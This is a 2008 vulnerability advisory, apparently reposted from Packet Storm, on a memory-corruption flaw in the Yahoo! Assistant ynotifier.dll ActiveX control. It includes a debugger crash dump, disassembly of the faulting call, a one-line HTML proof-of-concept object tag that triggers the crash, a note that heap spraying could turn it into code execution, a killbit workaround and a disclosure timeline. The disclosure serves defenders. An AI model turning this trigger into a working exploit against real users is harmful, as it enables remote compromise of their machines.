Home / vulnerabilities AD20080506EN.txt
Posted on 07 May 2008
Source : packetstormsecurity.org Link
Yahoo! Assistant (3721) ActiveX Remote Code Execution Vulnerability
By Sowhat of Nevis Labs
Date: 2008.05.06
http://www.nevisnetworks.com
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt
CVE: N/A
Vendor
Yahoo! CN
Affected:
Yahoo! Assistant<=3.6
Overview:
Yahoo! Assistant, formerly named 3721 Internet Assistant, is a Browser
Helper Object for Internet Explorer. It was renamed to Yahoo! Assistant
after Beijing 3721 Technology was acquired by Yahoo!.
Yahoo! Assistant includes a lot of useful features, such as IE setting
repair, security shield, removal of internet history information and
blocking ads.
http://cn.zs.yahoo.com/
Details:
The specific flaws exists in the ynotifier.dll ActiveX control.
Succssfully exploiting this vulnerability allows attackers to execute
arbitrary code on vulnerable installation.
Successful exploitation requires that the target user browse to a
malicious web page.
During the instantiation of the Ynoifier COM object through IE, there
will an exploitable memory corruption condition.
(c78.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e85328 ebx=001ada20 ecx=4080624c edx=00128474 esi=020cb5f0
edi=00000000
eip=43f50743 esp=001283e0 ebp=00128478 iopl=0 nv up ei pl zr na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
43f50743 ?? ???
Code:
637a8b47 8b45f8 mov eax,[ebp-0x8]
637a8b4a 8b08 mov ecx,[eax]
637a8b4c 8d55fc lea edx,[ebp-0x4]
637a8b4f 52 push edx
637a8b50 6a01 push 0x1
637a8b52 50 push eax
637a8b53 ff5158 call dword ptr [ecx+0x58] ;
ds:0023:408062a4=43f50743
The virutal function call at 0x58 is pointed to invalid data.
By taking advantage of some heap spraying technique, the attacker can
exploit
this vulnerability to execute arbitrary code.
Proof of Concept:
The POC for this vulnerability is quite simple, save the following code as
HTML:
<object classid='clsid:2283BB66-A15D-4AC8-BA72-9C8C9F5A1691'>
Workaround:
Set a killbit for this ActiveX.
Vendor Response:
2008.04.23 Vendor notified via email
2008.04.23 Vendor response, developing for patch
2008.04.23 Patch developed, details was held because vendor asked for 1 week
to (silently ;) push the patch.
2008.05.06 Advisory released
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"